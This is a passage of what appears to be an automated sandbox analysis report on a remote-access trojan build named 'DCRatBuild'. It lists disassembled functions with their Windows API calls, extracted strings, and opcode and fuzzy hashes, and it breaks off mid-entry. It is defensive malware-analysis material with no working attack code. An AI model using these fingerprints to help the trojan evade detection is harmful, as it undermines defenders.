                                        Function 00757DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: e8b1bc1ebf0b31835e649fd48807a18490486b74d9cbbb6350113da6a4116fa2
                                        • Instruction ID: 8ee34e066df4d45565f2def854ee7be621f1c756b0676fb0847766935801a447
                                        • Opcode Fuzzy Hash: e8b1bc1ebf0b31835e649fd48807a18490486b74d9cbbb6350113da6a4116fa2
                                        • Instruction Fuzzy Hash: 5E410232A00304DFCB24DF78D885A9EB7B5EF85724F1585A8E905EB281DB74AD05CB80
                                        Function 0075B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 0075B619
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0075B63C
                                          • Part of subcall function 00758518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0075C13D,00000000,?,007567E2,?,00000008,?,007589AD,?,?,?), ref: 0075854A
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0075B662
                                        • _free.LIBCMT ref: 0075B675
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0075B684
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 7506dadb8cdb7bc2c65e2caae432f152671818c2915189bce7e9729e92c2f8d1
                                        • Instruction ID: 196a336f7a8ab345ffef3954befc7831ee8c21e6d13ddcc9a5eb14978f2c1db2
                                        • Opcode Fuzzy Hash: 7506dadb8cdb7bc2c65e2caae432f152671818c2915189bce7e9729e92c2f8d1
                                        • Instruction Fuzzy Hash: CE01B162601615BF63211A766C8DCBB6A6DEAC7BA23144228FC05D2110EFE88D05C1B0
                                        Function 0074075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00740A41: ResetEvent.KERNEL32(?), ref: 00740A53
                                          • Part of subcall function 00740A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00740A67
                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0074078F
                                        • CloseHandle.KERNEL32(?,?), ref: 007407A9
                                        • DeleteCriticalSection.KERNEL32(?), ref: 007407C2
                                        • CloseHandle.KERNEL32(?), ref: 007407CE
                                        • CloseHandle.KERNEL32(?), ref: 007407DA
                                          • Part of subcall function 0074084E: WaitForSingleObject.KERNEL32(?,000000FF,00740A78,?), ref: 00740854
                                          • Part of subcall function 0074084E: GetLastError.KERNEL32(?), ref: 00740860
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                        • String ID:
                                        • API String ID: 1868215902-0
                                        • Opcode ID: 10f49f0e1c5f59b2301afdee7e6ef0d6ee622af64d49192709cc3ce4ca4768f2
                                        • Instruction ID: e5bc575b0d4866d009b04b5cdd7db49bf76174bb08009600287a11487b224411
                                        • Opcode Fuzzy Hash: 10f49f0e1c5f59b2301afdee7e6ef0d6ee622af64d49192709cc3ce4ca4768f2
                                        • Instruction Fuzzy Hash: FE01B571540704EFCB229B65DD88FC6BBFEFB48710F004519F25B42160DBB96A48CB94
                                        Function 0075BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0075BF28
                                          • Part of subcall function 007584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?), ref: 007584F4
                                          • Part of subcall function 007584DE: GetLastError.KERNEL32(?,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?,?), ref: 00758506
                                        • _free.LIBCMT ref: 0075BF3A
                                        • _free.LIBCMT ref: 0075BF4C
                                        • _free.LIBCMT ref: 0075BF5E
                                        • _free.LIBCMT ref: 0075BF70
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: a78d5fcfc27b23ec7fdbb8119cb533a3f2e0819eaea7a7ee70d675b1f92e8c1a
                                        • Instruction ID: 73f646594cefc3081e7740f175f6487dc999d9158c60dc200048affeaaa5dbf0
                                        • Opcode Fuzzy Hash: a78d5fcfc27b23ec7fdbb8119cb533a3f2e0819eaea7a7ee70d675b1f92e8c1a
                                        • Instruction Fuzzy Hash: 51F06832605340E786E0DF54EDC9DA773D9BA00351354C805FC49D7950CBBCFC454A65
                                        Function 00737574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00737579
                                          • Part of subcall function 00733B3D: __EH_prolog.LIBCMT ref: 00733B42
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00737640
                                          • Part of subcall function 00737BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00737C04
                                          • Part of subcall function 00737BF5: GetLastError.KERNEL32 ref: 00737C4A
                                          • Part of subcall function 00737BF5: CloseHandle.KERNEL32(?), ref: 00737C59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                        • API String ID: 3813983858-639343689
                                        • Opcode ID: caf83b44192d2b60562fc81c434694b6aba2f98b8e534dcf188863dbb97041a8
                                        • Instruction ID: 30bcb57217130bf9836a6d35bc086ba491079944d2d8673c096b543931e5d12d
                                        • Opcode Fuzzy Hash: caf83b44192d2b60562fc81c434694b6aba2f98b8e534dcf188863dbb97041a8
                                        • Instruction Fuzzy Hash: 2031C1B1908248EEEF24EB68DC4AFEEBB79AF15354F004059F449A7153DBBC4A44C7A0
                                        Function 0074A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        • EndDialog.USER32(?,00000001), ref: 0074A4B8
                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0074A4CD
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0074A4E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: ASKNEXTVOL
                                        • API String ID: 445417207-3402441367
                                        • Opcode ID: decc2f1c897d7eaf378fa89fd14fc393dd09fdd4c7c2550ffcf4e721b09cbfb4
                                        • Instruction ID: 76f26e7ee486be35c78e6a9955efc89fdf2b869ca4b69c6a2f97e9b406a362c7
                                        • Opcode Fuzzy Hash: decc2f1c897d7eaf378fa89fd14fc393dd09fdd4c7c2550ffcf4e721b09cbfb4
                                        • Instruction Fuzzy Hash: 9F11B632284280BFE6219FACDD4DF6A3769EB5B700F144006F241970A1C7AD9906D777
                                        Function 0073D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: __fprintf_l_strncpy
                                        • String ID: $%s$@%s
                                        • API String ID: 1857242416-834177443
                                        • Opcode ID: b9ec35e0602d763efbb05bfbecd7921c6ae961fc8ed8e0118e3d8b970b1e67f2
                                        • Instruction ID: f13264c8403f6949b237318ca82fb667afe5eb35bffe0775f468a157803ad8e4
                                        • Opcode Fuzzy Hash: b9ec35e0602d763efbb05bfbecd7921c6ae961fc8ed8e0118e3d8b970b1e67f2
                                        • Instruction Fuzzy Hash: 2D214D7294030CEBEB31DEA4DC4AFEA7BA8AB05300F040512FE1596192E379EA59DB51
                                        Function 0073B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • _swprintf.LIBCMT ref: 0073B51E
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
                                        • _wcschr.LIBVCRUNTIME ref: 0073B53C
                                        • _wcschr.LIBVCRUNTIME ref: 0073B54C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                        • String ID: %c:\
                                        • API String ID: 525462905-3142399695
                                        • Opcode ID: 5f11fe1c3bb84ddd337d3b7a4363c5e52e8826c01f68d591bae508829a861777
                                        • Instruction ID: 947b7ffc33cf555fa65e9f28fe069774f53163f916c2a0c03012b03c6c2ec0ee
                                        • Opcode Fuzzy Hash: 5f11fe1c3bb84ddd337d3b7a4363c5e52e8826c01f68d591bae508829a861777
                                        • Instruction Fuzzy Hash: F701F953904311FAE7206BB59C8BD6BB7ACDE953A1F50441AFE45C6083FB38D964C2A1
                                        Function 007406BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0073ABC5,00000008,?,00000000,?,0073CB88,?,00000000), ref: 007406F3
                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0073ABC5,00000008,?,00000000,?,0073CB88,?,00000000), ref: 007406FD
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0073ABC5,00000008,?,00000000,?,0073CB88,?,00000000), ref: 0074070D
                                        Strings
                                        • Thread pool initialization failed., xrefs: 00740725
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                        • String ID: Thread pool initialization failed.
                                        • API String ID: 3340455307-2182114853
                                        • Opcode ID: 2a14d5477a31c2630881fb832ce894d992fae41fa214fd401c280df972ac13c9
                                        • Instruction ID: f272007626d40c5f2bc017568deacea740bc17d1ecb22ae37c18ab61d85d1abf
                                        • Opcode Fuzzy Hash: 2a14d5477a31c2630881fb832ce894d992fae41fa214fd401c280df972ac13c9
                                        • Instruction Fuzzy Hash: 3B11A3B1540708AFD3215F75C888AA7FBECFB95744F10882EF2DB82200D7B96980CB94
                                        Function 0074D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                        • API String ID: 0-56093855
                                        • Opcode ID: 6b67097b27c16316374d1f17908c5af30e837f891094aa4625d217422af3b500
                                        • Instruction ID: 9015e90cc17590f5655a23f5dfefe23cfbf512a7390902452107882075bbb38f
                                        • Opcode Fuzzy Hash: 6b67097b27c16316374d1f17908c5af30e837f891094aa4625d217422af3b500
                                        • Instruction Fuzzy Hash: B401D471640285EFCB619F19EC48E9A3BA9E7043D0F148431F849D2231C7BD9CA0EBA6
                                        Function 007591DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                        • Instruction ID: f3947312975c4da285f1d91cb9608a1d96fc11ee29c732d91f3f4772d9f2d925
                                        • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                        • Instruction Fuzzy Hash: BCA15671900386DFEB21CE68C8917EEBBA5EF51311F18416DEE859B281D3BC9D4AC750
                                        Function 0073A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,007380B7,?,?,?), ref: 0073A351
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,007380B7,?,?), ref: 0073A395
                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,007380B7,?,?,?,?,?,?,?,?), ref: 0073A416
                                        • CloseHandle.KERNEL32(?,?,00000000,?,007380B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0073A41D
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: File$Create$CloseHandleTime
                                        • String ID:
                                        • API String ID: 2287278272-0
                                        • Opcode ID: 6be1d80c20c0b51b0702a8e64312f77e4af19792879ea50d608a6b7acdbdacea
                                        • Instruction ID: 8054cec8fa674e56aa75894bff04775ab270008b67b35b559e79b0545c783181
                                        • Opcode Fuzzy Hash: 6be1d80c20c0b51b0702a8e64312f77e4af19792879ea50d608a6b7acdbdacea
                                        • Instruction Fuzzy Hash: 4141BE31248381AAE731DF64DC46FABBBE4AF95700F04091DF5D1931C2D66D9A48DB53
                                        Function 0075C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007589AD,?,00000000,?,00000001,?,?,00000001,007589AD,?), ref: 0075C0E6
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0075C16F
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,007567E2,?), ref: 0075C181
                                        • __freea.LIBCMT ref: 0075C18A
                                          • Part of subcall function 00758518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0075C13D,00000000,?,007567E2,?,00000008,?,007589AD,?,?,?), ref: 0075854A
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 0bcbeb4af0f6efdc50fdfe0d164c9510422e2b970b3e3f17ed966ea17bed53da
                                        • Instruction ID: 19b6f0d202990763b3c1ad49560ea0c025b16cb15d3e8f5ca28640c8e4b59dce
                                        • Opcode Fuzzy Hash: 0bcbeb4af0f6efdc50fdfe0d164c9510422e2b970b3e3f17ed966ea17bed53da
                                        • Instruction Fuzzy Hash: 9C31D0B2A0060AAFDB268F74CC85EEE7BA5EB40711F044128FC05DB151EB79CD58CBA1
                                        Function 00749DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00749DBE
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00749DCD
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00749DDB
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00749DE9
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: c3d9d146dae2f60684d63226c8387b07afe2ee6cb92c66cc67356a1ea4611cf2
                                        • Instruction ID: b84dc31fef2086df4db453fa151b8c902fc555d9b24b87420ef0f5e0f319124b
                                        • Opcode Fuzzy Hash: c3d9d146dae2f60684d63226c8387b07afe2ee6cb92c66cc67356a1ea4611cf2
                                        • Instruction Fuzzy Hash: 1AE0EC31986A21B7D7642BA9AC0EB8B3B54AB0A762F058006F70596191DAB84447CF99
                                        Function 00752016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00752016
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0075201B
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00752020
                                          • Part of subcall function 0075310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0075311F
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00752035
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
